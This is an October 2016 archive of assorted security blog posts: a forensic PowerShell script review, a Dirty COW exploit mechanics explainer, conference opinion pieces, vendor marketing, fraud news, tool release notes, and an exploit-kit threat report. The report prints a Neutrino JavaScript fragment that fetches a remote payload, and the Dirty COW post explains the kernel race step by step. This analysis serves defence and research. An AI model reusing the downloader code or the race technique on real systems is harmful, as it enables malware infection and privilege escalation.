Monthly Archives: October 2016

Toolsmith – GSE Edition: snapshot.ps1

I just spent a fair bit of time preparing to take the GIAC Security Expert exam as part of the requirement to recertify every four years. I first took the exam in 2012, and I will tell you, for me, one third of the curriculum is a "use it or lose it" scenario. The GSE exam covers GSEC, GCIH, and GCIA. As my daily duties have migrated over the years from analyst to leadership, I had to "relearn" my packet analysis fu. Thank goodness for the Packetrix VM and the SANS 503 exercises workbook, offsets, flags, and fragments, oh my! All went well, mission accomplished, I'm renewed through October 2020 and still GSE #52, but spending weeks with my nose in the 18 course books reminded of some of the great tools described therein. As a result, this is the first of a series on some of those tools, their value, and use case scenarios.
I'll begin with snapshot.ps1. It's actually part of the download package for SEC505: Securing Windows and PowerShell Automation, but is discussed as part of the GCIH curriculum. In essence, snapshot.ps1 represents one script to encapsulate activities specific to the SANS Intrusion Discovery Cheat Sheet for Windows.
The script comes courtesy of Jason Fossen, the SEC505 author, and can be found in the Day 5-IPSec folder of the course download package. The script "dumps a vast amount of configuration data for the sake of auditing and forensics analysis" and allows you to "compare snapshot files created at different times to extract differences."
To use snapshot.ps1 place the script into a directory where it is safe to create a subdirectory as the script creates such a directory named named for the computer, then writes a variety of files containing system configuration data.  Run snapshot.ps1 with administrative privileges.
The script runs on Windows 7, Server 2008, and newer Windows operating systems (I ran it on Windows 10 Redstone 2) and requires PowerShell 3.0 or later. You also need to have autorunsc.exe and sha256deep.exe in your PATH if you want to dump what programs are configured to startup automatically when your system boots and you login, as well as run SHA256 file hashes.
That said, if you must make the script run faster, and I mean A LOT FASTER, leave file
hashing disabled at the end of the snapshot.ps1 for a 90% reduction in run time. 
However, Jason points out that this is one of the most useful aspects of the script for identifying adversarial activity. He also points out that snapshot.ps1 is a starter script; you can and should add more commands. As an example, referring back to toolsmith #112: Red vs Blue - PowerSploit vs PowerForensics, after importing PowerForensics, you could add something like Get-ForensicTimeline | Sort-Object -Property Date | Where-Object { $_.Date -ge "12/30/2015" -and $_.Date -le "01/04/2016" } | WriteOut -FileName Timeline which would give you a file system timeline between the 12/30/2015 and 01/04/2016.But wait, there's more! Want to get autoruns without needing autorunsc.exe?  Download @p0w3rsh3ll's AutoRuns module, run Import-Module AutoRuns.psm1, then Get-Command -Module AutoRuns to be sure the module is on board, and finally comment out autorunsc.exe -accepteula -a -c | Out-File -FilePath AutoRuns.csv then add Get-PSAutorun | WriteOut -FileName AutoRuns.
It's then as simple as running .\Snapshot.ps1 and watch your computer-named directory populate, 0V3RW4TCH-2016-10-31-9-7 in my case, per Figure 1.

Figure 1: Snapshot.ps1 run
Most result files are written in machine-readable XML, CSV, and TXT, as well as REG files generated by the registry exports via reg.exe.
A great example of a results file, is spawned via dir -Path c:\ -Hidden -Recurse -ErrorAction SilentlyContinue | Select-Object FullName,Length,Mode,CreationTime,LastAccessTime,LastWriteTime | Export-Csv -Path FileSystem-Hidden-Files.csv. The resulting CSV is like a journey down evil memory lane, where all the nuggets I've tested in the past leave artifacts. This would be EXACTLY what you would be looking for under real response scenarios, as seen in Figure 2.

Figure 2: Snapshot.ps1 grabs hidden files
Sure, there are bunches of related DFIR collection scripts, but I really like this one, and plan to tweak it further. Good work from Jason, and just one of many reasons to consider taking SEC505, or pursuing your GSE!
Cheers...until next time.

Dirty COW Notes

I am not used to write about vulnerabilities because there are too much vulnerabilities out here and writing about just one of them is not going to contribute security community at all. So why am I writing about Diry Cow ? I am going to write about it because, in my personal opinion, it is huge. When I say "huge" I don't really mean it will be used to exploit the "entire world" but I mean it highlights two mains issues:
  • Even patched code could easily hide the same vulnerability, just in a different way. How many patched code are not really "patched" ?
  • A new pragmatic approach to identify vulnerabilities: looking into patched code and check the  patch implementation.
But let's start from the beginning by taking a closer look to the exploit code.

Click to enlarge: Taken From Here

As many other kernel vulnerabilities it relays on concurrency; the exploit code fires on two separate threads who will access at the same time to the same resource.  Taking a closer look to the main function you will see that the mmap syscall has been used.

calling mmap function
From documentation:
creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping.

mmap does not create a memory copy but rather it creates a new mapping of that (filedescriptor) memory area. It means the process will read data directly from the original file rather than from a copy of it.  While most of the parameters are obvious the MAP_PRIVATE flag is the "core" of the vulnerability. It enables the "copy on write" (from here the name COW) which basically copies the original data in a new memory area during the write access to the same data. Since the mmap has just mapped a readonly area and the process wants to write data on it, mmap (MAP_PRIVATE) will create a copy of that data on write actions, the modified data will not be propagated to the original memory area. 

Now the exploit runs two threads which will exploit a race condition to get "write access" to the original memory area. The first thread runs several times the function call madvise (memory advise) which is used to increase process performances by tagging a memory area according to its usage: for example  the memory could be tagged as NORMAL,  SEQUENTIAL, FREE or WILLNEED, an so on... In the exploit, the mmap memory is continuously tagged as DONTNEED,  which basically means the memory is not going to be used in the next future so the kernel could free its space and reload the content only when needed.

First Thread implementing madvise

On the other hand another thread is writing on its own memory space (by abusing the pseudo file notation: /proc/self/mem) directly on the mmap area pointing to the opened file. Since we have invoked the mmap function through the MAP_PRIVATE flag we are not going to write on the specifi memory but on a copy of it (copy on write).


Second Thread implementing write on pseudo self/mem

The race condition between those two threads tricks the write on copy on the original memory area since the copied area could be tagged has DONTNEED while the write procedure is not finished yet. And voilà you are going to write in a readonly file !

OK now we figured out how the trick worked so far but what is most interesting is the story behind it?

Going on issue tracker: Linus Trovalds (maximum respect) wrote:

This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement software dirty bits") which made it into v3.9. Earlier kernels will have to look at the page state itself. Also, the VM has become more scalable, and what used a purely theoretical race back then has become easier to trigger.
S390 is ancient IBM technology.... I am not even sure it still exists on real world (at least if compared to recent systems). Probably linux community forgot about that removal otherwise would left it in the recent memory managers.

Anyhow the bug now "has been fixed" by introducing a new internal Flag called FOLL_COW (really !?J) which basically says "yes I already did the copy on write".
Basically the process can write to even unwritable pte's, but only after it has gone through a COW cycle and they are dirty. Following the diff patch

Dirty Cow Patch3 on October 2016



Dirty Cow vulnerability blowed in my mind a new vulnerability hunting process. On one hand laboratories with extremely sophisticated, tuned and personalised fuzzers perform the "industrial" way (corporate and/or governative) to find new vulnerabilities, on the other hand more romantic and crafty way done by professionals and/or security researchers used to adopt handy works and smart choices. But another smart approach (industrial or romantic) could be to investigate into the patched code by itself.

Patched code is by definition where a bug or issue where located. The most difficult part of finding vulnerabilities (not exploiting them) is to figure out where they are in thousands lines of code. So finding vulnerability on patched code could be much more quick even if with high "hypothetical" complexity since a patch is involved. But as this case testifies ...  is not always the case!

Wrong About Presentations

But first- this series is a bit off-the-cuff and lacking in polish, but I’ve been meaning to do it for ages and if I wait, well, this blog continues to look abandoned.  So please forgive the rambling and read on.

Today let’s start talking about presentations.

I have heard and read that they are all too long, except the ones that are too short.  That talks are simultaneously too technical and too high-level.  Oh, and all panels suck.  Ted-style talks are the best, except that they are hollow, empty, and don’t work for highly technical content.  And you should never let vendors speak because we’re all just sales weasels, except for the events where only “sponsors” get to speak.

Let me once again venture into crazy talk: it really depends on who you are and what you want.  I don’t like vendor sales pitches, but apparently some folks find them a good use of their time.  I’d rather avoid those kind of talks, but that’s me (and probably you, too, but whatever).  If sales presentations are a good use of your time, that’s OK with me.  I do hope you do some homework before whipping out the old purchase orders, though.

I will say that a lot of presentations I’ve seen could have been delivered better in a shorter timeframe- but that’s as much on the events as the speakers.  If the only choice is an hour slot, people do an hour talk.  I do think the quality of things like Shmoocon Firetalks is in part because people often pare down what they planned to be a longer talk, leaving only the key points and deliver them in a short time.  Scheduling talks of different lengths does pose real logistical challenges for conference organizers, but I think it would be good to make it easy for people to do shorter talks.  Of course, speaker ego can be an issue, we need to make it clear that the quality of the talk is not tied to the length of the talk.  I also thing that shorter talks make it easier to get new things in front of an audience.

Presentation style, there’s a topic sure to inflame absolutists.  The style has to match the speaker and the topic.  You will never do a good Ted-style talk that walks through the code of your new project or steps through disassembly of malware.  Conversely, a code walk isn’t the way to explain big picture issues.  Lately my presentations weave the ideas and information together via storytelling, in a style that sometimes borders on stand-up comedy.  And it works for me and the less technical topics I’ve covered in the past few years, but it certainly won’t work for everyone or every topic.  I know there are disciples of some books and styles such as Presentation Zen and Slide:ology, I think they are great resources but as always there is no One True Way.  Do what works for your audience and for you.

As far as panels, many are indeed often a lazy attempt at getting on the schedule, they’re frequently poorly moderated and wander off topic into incoherent ramblings.  It is also true that well-run panels can showcase display a diverse set of opinions and experiences and add nuance to complicated topics.  Panels do not suck, bad panels suck.

And no, this series isn’t over, I’m just getting warmed up.

 

Jack

ART – Panda’s Intelligent Control Platform

art-blog

In the complex world of IT security, real-time information is fundamental to protect corporate data and resources. Most enterprises are aware that if they do not have complete visibility of their network, it is easy to fall victim to cyber-attacks.

Although a large focus has been placed on external threats such as Ransomware, businesses are also at risk from internal threats.

Employees have access to immense amounts of company data daily, and often organisations are not able to track what employees are accessing and what they are doing with company data. Without proper security in place employees can be the organisation’s biggest threat, as was the case with now infamous Edward Snowden and Bradley Manning. Snowden, stole and published classified NSA documents, and Manning, formerly a US army soldier disclosed confidential military and diplomatic documents to WikiLeaks.
Organisations need to be aware of, and manage such internal threats, in addition to the ever present external threats as such Ransomware and APT’s.

Managing the actions of all employees is a mammoth task whether the organisation has 10 or 10 000 employees. Businesses need to leverage new technology to reduce this burden, technology such as Panda Security’s new Advanced Reporting Tool. This efficient and easy-to-use tool analyses data to gain insight into corporate resource usage in order to make informed strategic decisions.

art-2

ART automatically generates security intelligence allowing businesses to take control of all your endpoints and combat poor internal practices.

Advanced Reporting Tool (ART) is an add-on for Panda’s Endpoint Detection and Response solution, Adaptive Defense, and enables information about all the processes running, gathered by Adaptive Defense, to be extracted, stored and correlated by ART. The platform automatically generates security intelligence and allows users to identify risky behaviours or problems – ultimately exposing any misuse of the corporate network or resources.

In short, ART allows IT administrators to:

  • Search relevant information. Increasing efficiencies by enabling IT staff to find any problem areas.
  • Pinpoint problems by extracting behaviour patterns from resources and users, as well as identifying its impact on the business.
  • Real-time alerts about any possible data breaches.
  • Generate configurable reports showing the status of key security indicators and how they are evolving.

Advanced Reporting Tool – a real-time diagnosis tool that enables full visibility of the network.

In addition to the existing Big Data Cloud Service and its real-time alerts, ART includes predefined and adaptable analysis with four different action areas:

  • Information about IT security incidents. ART generates security intelligence then processes and associates those events as intrusion attempts.
  • Controls network applications and resources.
  • Controls access to business data.
  • Displays file access with confidential information and its online traffic.

art-1

The SIEMFeeder platform enables businesses to take advantage of Big Data and maximise resources.

Many organisations are taking further steps to ensure they are protected from threats by implementing a SIEM solution. As an alternative or compliment to the Advanced Reporting Tool, Panda Security has developed SIEMFeeder – an add-on that enables communication between Adaptive Defense and users’ existing SIEM tool.

SIEMFeeder provides relevant data, amplifies information and associates it with the information you already have, enabling detection of risk areas before they become the biggest threat to your business.

The post ART – Panda’s Intelligent Control Platform appeared first on CyberSafety.co.za.

Cutting through the Dyn

Last Friday (21 Oct), one of the largest DDoS attacks ever seen, created widespread internet outage affecting services from Twitter, AWS, Reddit, Netflix, Spotify, CNN, Paypal, NY Times, WSJ, and others. The attack was directed at Dyn, a domain name service provider, whose servers interpret internet addresses, directing web traffic to the affected companies. Dyn …

Startup Security Weekly #13 – Gimme Some Moore

HD Moore, founder of the Metasploit project, joins us for an interview. In startup news, we talk about  the differences between Angel and VC investments, expanding the concept of entrepreneurship, is running a startup for you?, how to become a cybersecurity entrepreneur in a crowded market, and making your elevator pitch more memorable. Stay tuned!

Improved Efficiency and Centralised Management with new Systems Management

Aerial shot of a group of coworkers discussing notes at a meeting

In today’s digital world internet connected devices have become a part of every aspect of our lives, and as this digital transformation continues, it is imperative that businesses understand the complexities that come with it.

To address this situation, Panda Security present our latest version of Systems Management – the most powerful, scalable and easy-to-use Remote Monitoring and Management (RMM) tool on the market.

The Challenge

Digital transformation brings with it a number of new challenges that business leaders must consider. Adding to the already complex IT environment, some of the challenges businesses face include; the ever increasing number of devices connected to the organisations network, the growing number of remote users, as well as the need to fix problems with greater flexibility.

The growing number of devices used every day in the workplace brings with it the threat of new incidents that disrupt work. Consequently, as these inefficiencies multiply, they add to the IT department’s workload, and affect business management, often resulting in security being overlooked.

The Solution – Greater Automation and Maximum Performance

Systems Management remotely monitors and manages devices from the Cloud so that every IT department can offer a professional service that minimises impact on daily work.

Whats New

The new version of Systems Management gives you maximum performance out-of-the-box. To increase efficiency and grow business for our clients and partners, Systems Management facilitates five pillars.

  • Asset Inventory

  • Device Monitoring
  • Remote Device Management
  • Resolution Tool Support
  • Generated Reports

This version comes with significant new and updated features in response to customer feedback, highlights include:

  • Recommended monitoring policies based on the best practices of clients.
  • New filters to improve management systems – instant visualisation of the network so you can see what you need.
  • New reports for server performance, CPU, memory, and disc performance for the last 30 days, including general averages.
  • Integrates with Microsoft Hyper-V and the new hardware monitors added for VMware ESXi.
  • New maintenance Windows—alerts can now be programmed and silenced.

This new update makes Systems Management a powerful, highly scalable, easy-to-use administration tool that will save users time and money.

The post Improved Efficiency and Centralised Management with new Systems Management appeared first on CyberSafety.co.za.

Relevant to my rants

Before I resume my rambling on conferences and presentations, here’s a great article I came across via Tales of the Cocktail, a site you would expect me to link to from my, ahem, travel blog.

This article is specifically about submitting a cocktail seminar to Tales of the Cocktail, but several points in the list of seventeen items apply to a wide variety of events, regardless of topic or venue.

Also, it has been said many times by many people and in many ways- one of the best tips for getting your proposal accepted at any event is to follow the rules. Really, read the rules/guidelines for submission, and follow them.  Also, submit early.  Most event reviewers are volunteers and do it in their spare time, something which gets scarce when the deadline approaches.  Submit early and you’re more likely to get non-bloodshot eyes looking at your paper.

 

Jack

Catching IRS fraudsters proves the scale and profitability of impersonation cons

 Fraudsters who posed as IRS officials threatened hardworking Americans with imprisonments for the crime of tax default. Their modus operandi was simple; question victims about defaulting on their tax payments, threaten legal action, arrest, deportation or suspension of business rights, and finally offer an easy way out – a chance to close the case without prosecution for a onetime deposit in a bank account or alternatively getting the bank account details of the victim which were then wiped clean.

Incredible as it may seem, the con was so successful that the kingpin lived a life of 5 star luxury, with fancy cars and hotel stays. In a short span of two years he amassed significant wealth and employed over a 700 people in several call centers across India and the US. Most of these call centers were owned by trusted associates and employed high school graduates or drop outs who they lured with high pay and luxurious lifestyles.

Income earned in dollars was converted into India rupees using illegal money laundering channels called Hawala. All employees were paid in cash. Call center executives were offered incentives based on the income they generated from these frauds, and the ones that performed were even offered a chance to work directly with the kingpin, in his home city of Ahmedabad, Gujarat while being put up in 3 and 4 star hotels.

Fortunately, India takes these crimes seriously, and once reported, Mumbai police detectives over a period of 15 days, went incognito and surveyed these call centers before busting them and arresting over 50 people. All convicted will be tried under the Indian IT act and penal code.

There are however, several countries that do not take action on these crimes as the victims are not citizens of their countries.

Cybercitizen’s are advised to be wary about calls which ask for personal information and money in some form or the other.  

Toolsmith Release Advisory: Malware Information Sharing Platform (MISP) 2.4.52

7 OCT 2016 saw the release of MISP 2.4.52.
MISP, Malware Information Sharing Platform and Threat Sharing, is free and open source software to aid in sharing of threat and cyber security indicators.
An overview of MISP as derived from the project home page:
  • Automation:  Store IOCs in a structured manner, and benefit from correlation, automated exports for IDS, or SIEM, in STIX or OpenIOC and even to other MISPs.
  • Simplicity: the driving force behind the project. Storing and using information about threats and malware should not be difficult. MISP allows getting the maximum out of your data without unmanageable complexity.
  • Sharing: the key to fast and effective detection of attacks. Often organizations are targeted by the same Threat Actor, in the same or different Campaign. MISP makes it easier to share with and receive from trusted partners and trust-groups. Sharing also enables collaborative analysis, preventing redundant work.
The MISP 2.4.52 release includes the following new features:
  • Freetext feed import: a flexible scheme to import any feed available on Internet and incorporate them automatically in MISP. The feed imported can create new event or update an existing event. The freetext feed feature permits to preview the import and quickly integrates external sources.
  • Bro NIDS export added in MISP in addition to Snort and Suricata.
  • A default role can be set allowing flexible role policy.
  • Functionality to allow merging of attributes from a different event.
  • Many updates and improvement in the MISP user-interface including filtering of proposals at index level.
Bug fixes and improvements include:
  • XML STIX export has been significantly improved to ensure enhanced compatibility with other platforms.
  • Bruteforce protection has been fixed.
  • OpenIOC export via the API is now possible.
  • Various bugs at the API level were fixed.
This is an outstanding project that will be the topic of my next Toolsmith In-depth Analysis.

Cheers...until next time.

Wrong About Conferences, part 3

Thought I’d get tired of this topic?  No way, I’m just getting warmed up.

Today’s installment continues on the events themselves:

A lot of people complain about the commercialization, the sales pitches, the circus-like atmosphere of some vendor areas.  I’m not a big fan of these things myself (OK, I loathe them), I prefer to engage with vendors in a rational manner- but whether you are buying antivirus, SIEM, a new car, or a washing machine, expect the sales hype.  If you are like me you’ll ignore the excesses and gravitate towards the companies who bring engineers and maybe even support personnel to accompany the sales and marketing teams  to shows so that they can answer hard questions and help existing customers.  And if you aren’t buying, or curious about the tech, avoid those parts of the events altogether (or as much as the venue allows).

The same events which have the big vendorfests are often the best for meeting people for quiet meaningful conversations- not at the show but nearby, away from the mayhem.  If thousands of people go to the event, there may be folks there you want to talk to, you don’t have to meet at the conference.  If you are going to do this, make appointments.  You will not just run into folks and have time to chat.  And “I’ll meet you in the lobby” isn’t good enough, especially at sprawling complexes like the Moscone Center in San Francisco, the Las Vegas Convention Center, and other huge venues.

The flip side of over commercialization are the community events with little or no advertising and sales.  They are a great relief to many of us who suffer the excesses at commercial shows, but they don’t generate leads for the sponsors so it can be hard to pull in the funding needed for the event.  These events often get funded primarily through ticket sales because someone has to pay.  A lot of companies will provide sponsorship for visibility and the good of the community, but there are a lot of community conferences and not enough money for all of them.

The realms of for-profit, not-for-profit, and non-profit are too convoluted a topic for this series, bet whether people want to make money from an event or not, they want people to like the event.

It is also worth mentioning the size of events.  Everyone want to go to the cool events, and so some grow until they aren’t what they used to be, and a lot of folks complain about this.  When I hear such complaints I am reminded of what the sage Yogi Berra said many years ago about Rigazzi’s in St. Louis:

“Nobody goes there anymore, it’s too crowded”

But if events cap attendance and demand continues to grow they get accused of being exclusionary by some.  What’s a conference organizer to do?

You’ll note I’ve avoided naming specific events, although I’m sure most of you have assigned names to several things I’ve mentioned.  I would, however, like to use one specific group as an example, an example that could be applied to many other groups and events.  DC303, the Denver area DEF CON group, is well known and very active, and I’ve heard them accused of being “cliquish”  and excluding people from activities and events.  I would like to make two points abut DC303 (note, I am *not* a 303 member):

First, as with most organizations, some things are limited to members.  I can’t expect to toss my kayak in the bay and be welcomed down at the yacht club.  Some things are more open than others- and some do require an invitation, which leads to my second point:

My first interaction with the 303 crew was in July of 2009, at the first BSides Las Vegas.  I knew almost no one other than from a few online exchanges, they certianly didn’t know me.  And it didn’t matter, I showed up and got to work as did several others- and many of us became friends.  That’s it, three simple steps: show up, participate, and be accepted.  If you skip step two you probably won’t make it to step three.  This applies at your local LUG or ISSA chapter as much as to 303 or pretty much any other entity.

Next week I’ll change topics a bit and babble about what’s wrong with presentations, speakers, and who knows what else.

 

Jack

Wrong About Conferences, part 2

Today let’s start with a look at the conferences and events themselves.  One of the cyclical things I see is dismissing events people don’t like as irrelevant or worse.

“The big commercial cons are irrelevant…” as tens of thousands of people go to them, learn, share and yes, do the business of InfoSec.  The business of InfoSec, it’s so ugly and dirty, oh, and pays tens of thousands of us a living while funding an amazing amount of research.  Maybe they aren’t the places for cutting edge research, especially offensive security stuff, but that’s not their core audience.

Are there excesses? Sure there are.

Are they valuable to a lot of people?  Of course they are.

And very few people are forced to go unless they are paid to do so.

Don’t like it?  Not your scene?  Cool, don’t go.

 

“That’s just a hacker con, full of criminals…” as thousands or even tens of thousands of people gather to learn, share, and (gasp) maybe even do a little business.  Yeah, we’re all a bunch of criminals, right.  No, almost all of us at hacker cons are trying to make the world more secure.  You may disagree with some methods and opinions, but hacker cons help make us more secure.  Some may not be the best places to learn a lot about policy and compliance issues, or securing global enterprises, but that’s not what they’re about- and some “hacker” cons do cover these topics well.

Are there excesses? Sure there are.

Are they valuable to a lot of people?  Of course they are.

And very few people are forced to go unless they are paid to do so.

Don’t like it?  Not your scene?  Cool, don’t go.

Fifty years ago buffalo Springfield sang “Nobody's right if everybody's wrong”, and that sums up the way I feel about a lot of the con noise, hype, and drama.  Find the events that work for you, contribute to making them better, and avoid the ones that don’t work for you.

There are plenty of things I don’t like about a lot of events, I’m a cranky old man.  I do, however, understand that different events serve different needs and audiences.  That doesn’t excuse hype, lies, and bullshit but no event has a monopoly on that.

More on events in the next few posts.

 

Jack

Everyone is wrong about conferences

In the past couple of years there have been many blog posts and articles on the topics of what’s wrong with InfoSec and hacker conferences, which events are or are not relevant, and what’s wrong with the talks and panels at those conferences.  A lot of good points have been raised, and some great ideas have been floated.file00029400867

But they are all wrong.

Many of them aren’t just wrong, they’re also symptomatic of some of the things wrong with InfoSec, a failure to understand the importance of context and perspective.

Let’s start with this simple fact:

Your experience is unique, it is not not universal.  Your perspective is therefore not a universal perspective.

As with anyone offering The One True Answer to any question, allow me to suggest that It Isn’t That Simple.

In upcoming posts I’ll dig into a few of theses topics, not to give The One True Answer, but to share some of my experiences and perspectives, and float a few ideas of my own.  I don’t claim to be an expert on conferences or presentations (or much of anything else), but I am and have been involved in a lot of conferences- as an attendee, participant, program committee member, organizer, volunteer, vendor booth staff, speaker, and even bartender.  I also participate in events large and small, commercial and community, business- and hacker-centric.

And I have opinions.  You may have noticed.

Stay tuned.

 

Jack

Announcing CERT Basic Fuzzing Framework Version 2.8

Today we are announcing the release of the CERT Basic Fuzzing Framework Version 2.8 (BFF 2.8). It's been about three years since we released BFF 2.7. In this post, I highlight some of the changes we've made.

Your FOE Is Now Your BFF

To help reduce confusion over our fuzzing tools, the CERT Failure Observation Engine (FOE) is now known as BFF for Windows. For the past few versions, we have been converging the code bases for BFF and FOE into a unified architecture. While a few platform-specific differences remain, the name change reflects the fact that they are now essentially the same product with multi-platform support.

For clarity in this post, I'll refer to BFF for <platform> if we're talking about something platform-specific; otherwise I'll refer to BFF for features that are supported across platforms.

Significant Changes

BFF 2.8 has undergone a lot of changes since 2.7 was last released. Here is an overview of some of the bigger changes.

Configurable Mutators (New to Linux and OSX)

BFF for Linux and OSX now use the same configurable mutators as BFF for Windows. Prior to this release, BFF supported only bitwise mutation because it relied on zzuf for fuzzing and crash detection. FOE, on the other hand, had configurable mutators from day one, but was only available for Windows. With BFF 2.8, all platforms now default to using the bytemut mutator, which we have found to be more effective at searching the input space for crashing test cases.

BFF still uses zzuf on Linux and OSX for crash detection, but all mutation is now done directly in BFF's python code.

Verify Mode (New to Linux and OSX)

Having configurable mutators permits us to have a null mutator that does not modify the input files at all. As a result, Linux and OSX now support verify mode, another feature previously available only on FOE on Windows.

Verify mode can be useful in a few situations, including the following:

  1. Say you've previously run BFF against a piece of software and found crashing test cases. At some point, if a newer version of the software becomes available, you might want to check to see which of the test cases are now fixed.
  2. If you've got crashing test cases from another fuzzer, like American Fuzzy Lop (afl) or Peach Fuzzer, you could triage them using verify mode to run each test case through BFF's test case analysis pipeline to collect debugger output, exploitability estimates, core dumps, valgrind output, etc.

To use BFF in verify mode, do the following:

  • Take the old crashing test cases and use them as seed files. This approach can be accomplished using tools/copycrashers.py.
  • Run them through BFF in verify mode. Remember to configure the campaign to use the new version of the program you want to check them against.
  • Look at the results directory to see which test cases are still a problem.

Drillresults on Every New Crash (All Platforms)

Drillresults was originally included with FOE 2.0 for Windows as a standalone script that you could run to identify easily exploitable vulnerabilities from a fuzzing campaign's results after the fact. Later we added it to BFF for Linux and OSX, but it remained as a standalone script.

In BFF 2.8, drillresults is now run automatically on each crash as part of BFF's post-crash analysis pipeline. Each crashing testcase directory now contains a file with the .drillresults extension containing that information.

Architecture (All Platforms)

Under the hood, we've done quite a bit of refactoring to eliminate redundancies across the Linux and Windows codebases. The overall BFF architecture is now platform agnostic, with OS-specific code implemented in separate modules and subclasses where necessary. This consolidation allows us to more easily add new features across all the platforms that BFF supports without having to duplicate any more code than necessary.

Support for Recent OSX Versions

BFF for OSX should work on Mavericks, Yosemite, El Capitan, and Sierra.

Added !analyze Output (Windows)

BFF for Windows collects !analyze -v output (via CDB) for each unique crashing test case. Microsoft published more information about !analyze in their debugger reference materials.

Updated !exploitable (Windows)

BFF for Windows now uses Microsoft's !exploitable version 1.6.

Simplified Configuration (All Platforms)

The BFF configuration file, bff.yaml, was simplified to make configuring fuzzing campaigns easier.

Self-Update Capability (All Platforms)

BFF includes a utility called updatebff.py in the tools directory. Simply run tools/updatebff.py (or on Windows, tools\updatebff.py) to install the latest certfuzz code from GitHub.

Contributing and GitHub Availability

In early 2014 we converted our development process from svn to git, which also allows us to start pushing the work-in-progress code to GitHub. While our day-to-day development still happens in house, having the code available on GitHub allows us to work more directly with, and be more responsive to, outside contributors. It also gives BFF users a place to report bugs or make feature requests.

You can find the code on GitHub. You can also report a bug or request a feature on GitHub.

Download BFF

BFF 2.8 is available for download on our website.

For More Information

Complete release notes for BFF 2.8 are available. Finally, we have been maintaining some BFF-related content on our Vulnerability Analysis Wiki:

DerbyCon

DerbyCon was fantastic again this year, with talks from some of the best and brightest in NetSec. If you're not familiar with it, it's been held each year in September in Louisville, Kentucky since 2011. Admission to the conference (3 days) is only $175.00, and there are (relatively) inexpensive training classes held the previous two days before the con. If you've never been to a hacker conference, I highly recommend DerbyCon. The atmosphere is very friendly and helpful, and even someone brand new to NetSec can find plenty to learn and participate in.There is a lock pick village, a hardware hacking village, a SOHO router hacking room, a Capture The Flag contest and lots more, as well as official parties Friday and Saturday nights. This was my fifth year attending, and it gets better each time.
All the talks are recorded and available on Adrian Crenshaw's web site. This years talks are at:


RIG evolves, Neutrino waves goodbye, Empire Pack appears

  Neutrino waves Goodbye


Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.



Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016

RIG += internal TDS :

Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]
I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me)

Picture2: Blackhole - 2012 - Internal TDS illustration

but disappeared from the market with the end of Nuclear Pack

Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration

and Angler EK

Picture 4 : Angler EK - Internal TDS illustration

This is a key feature for load seller. It is making their day to day work with traffic provider far easier .
It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.

Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country).

Picture 5: A Sutra TDS in action in 2012 - cf The path to infection

RIG += RC4 encryption, dll drop and CVE-2016-0189:

Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.
A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189

Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo

Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.

Neutrino waves goodbye ?

On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :
“we are closed. no new rents, no extends more”
This explains a lot. Here are some of my last Neutrino pass for past month.
Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp

As you can see several actors were still using it…Now here is what i get for the past days :
Picture 9: Past days in DriveBy land
Not shown here, Magnitude is still around, mostly striking in Asia

Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.


Picture 10: Last banner for Neutrino as of 2016-09-16

Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.
Side reminder : Neutrino disappeared from march 2014 till november 2014

A Neutrino Variant

Several weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino.

Picture 11: Neutrino-v pass on the 2016-09-21

Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits

Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder
Note the pnw26 with no associated binary data, the rubbish and additionalInfo

A Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523



Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api

 function k2(k) {
var y = a(e + "." + e + "Request.5.1");
y.setProxy(n);
y.open("GET", k(1), n);
y.Option(n) = k(2);
y.send();
if (200 == y.status) return Rf(y.responseText, k(n))
};
Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)

I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it)

Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x
The actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.

Empire Pack:

Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised.

Picture 15: King of Loads - Empire Pack Panel

Some might feel this interface quite familiar…A look a the favicon will give you a hint

Picture 16: RIG EK favicon on Empire Pack panel


Picture 17: RIG Panel

It seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.
[Speculation]
